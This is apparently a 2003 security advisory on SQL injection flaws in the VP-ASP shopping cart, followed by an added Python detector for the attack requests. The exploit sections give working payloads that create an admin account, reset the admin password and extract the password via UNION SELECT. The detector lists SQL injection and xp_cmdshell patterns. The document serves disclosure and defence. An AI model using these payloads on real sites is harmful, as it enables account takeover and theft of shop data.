Virtual Programming VP-ASP is "a shopping cart application for e-commerce enabled sites. It is written in ASP, supports the following databases: Access, MSSQL, MySQL on Windows and MySQL on UNIX".
VP-ASP suffers from SQL injection vulnerabilities that may allow an attacker, in some cases, to gain administrative access to the installed VP-ASP Shopping Cart software or to execute arbitrary commands on the target system.
Credit:
The original advisory is available from: http://www.s-quadra.com/advisories/Adv-20031128.txt.
The information has been provided by Nick Gudov.
Vulnerability 1: SQL Injection Vulnerability in 'shopsearch.asp' Script
An SQL injection vulnerability has been found in the shopsearch.asp script. User-supplied input is not filtered before being used in a SQL query, so the query can be modified with malformed input. Exploitation of the vulnerability allows a remote attacker to insert a new user with administrative privileges. A more sophisticated exploitation would allow a remote attacker to execute arbitrary commands on the target system (for example via the MSSQL xp_cmdshell() function).
Exploit:
Platform: Win32/MSSQL
Posting this data to shopsearch.asp creates a new administrative account:
Keyword=&category=5); insert into tbluser (fldusername) values ('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='edsaqw' where fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
Posting this data to shopsearch.asp changes the admin password:
Keyword=&category=5); update tbluser set fldpassword='edsaqw' where fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
Vulnerability 2: SQL Injection Vulnerability in 'shopdisplayproducts.asp' Script
An SQL injection vulnerability has been found in the shopdisplayproducts.asp script. Exploitation of the vulnerability allows a remote attacker to read any information from the database.
Exploit:
Platform: Win32/MSSQL
http://somehost.com/vpasp/shopdisplayproducts.asp?cat=qwerty' union%20select fldauto,fldpassword%20from%20tbluser%20where fldusername='admin'%20and%20fldpassword%20like%20'a%25'--
By changing the value at the end of the request
%20'a%25'--
%20'b%25'--
%20'c%25'--
...
and looking through the HTTP response from the VP-ASP web server, an attacker can determine the administrator password.
Solution:
S-Quadra alerted the VP-ASP development team to this issue on 28th November 2003. Security fixes from the VP-ASP development team are available at: http://www.vpasp.com/virtprog/info/faq_securityfixes.htm.
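Until the vendor fix is applied, an administrator can check web server logs for the request shapes shown above and enforce an allow-list on the numeric parameter. The following is an added example, not code from the advisory or from VP-ASP; it assumes that shopsearch.asp's category parameter is always an integer (the advisory's benign values are 3 and 5) and that request query strings or POST bodies are available as URL-encoded text.

```python
import re
from urllib.parse import parse_qs

# Patterns taken from the advisory's payload shapes. Order matters: the first
# match is reported for each parameter value.
SQLI_PATTERNS = [
    (re.compile(r"\)\s*;"), "statement break after closing parenthesis"),
    (re.compile(r"\bunion\b.+\bselect\b", re.I), "UNION SELECT"),
    (re.compile(r"\binsert\s+into\b", re.I), "INSERT INTO"),
    (re.compile(r"\bupdate\b.+\bset\b", re.I), "UPDATE ... SET"),
    (re.compile(r"xp_cmdshell", re.I), "xp_cmdshell reference"),
    (re.compile(r"--\s*$"), "trailing SQL comment"),
    (re.compile(r"'"), "single quote"),  # noisy for free-text keywords; tune per site
]

def category_is_valid(value: str) -> bool:
    """Allow-list check for shopsearch.asp's category parameter.
    Assumption: category ids are positive integers, so anything else is rejected
    before it can reach the SQL query."""
    return re.fullmatch(r"[0-9]{1,9}", value) is not None

def inspect_request(uri_stem: str, raw_query: str) -> list:
    """Return (parameter, reason) findings for one URL-encoded query string or POST body."""
    findings = []
    params = parse_qs(raw_query, keep_blank_values=True)  # also decodes %20, %25 and '+'
    for name, values in params.items():
        for value in values:
            for pattern, reason in SQLI_PATTERNS:
                if pattern.search(value):
                    findings.append((name, reason))
                    break
    # Strict numeric check for the parameter abused in vulnerability 1.
    if uri_stem.lower().endswith("/shopsearch.asp"):
        for value in params.get("category", []):
            if not category_is_valid(value):
                findings.append(("category", "non-numeric category id"))
    return findings

if __name__ == "__main__":
    # Constructed sample requests: one benign, two built from the advisory's payloads.
    SAMPLES = [
        ("/vpasp/shopsearch.asp", "Keyword=shoes&category=5&SubCategory=All"),
        ("/vpasp/shopsearch.asp", "Keyword=&category=5); update tbluser set fldpassword='edsaqw' where fldusername='admin'--&SubCategory=All"),
        ("/vpasp/shopdisplayproducts.asp", "cat=qwerty' union%20select fldauto,fldpassword%20from%20tbluser%20where fldusername='admin'--"),
    ]
    for stem, query in SAMPLES:
        print(stem, inspect_request(stem, query) or "clean")
```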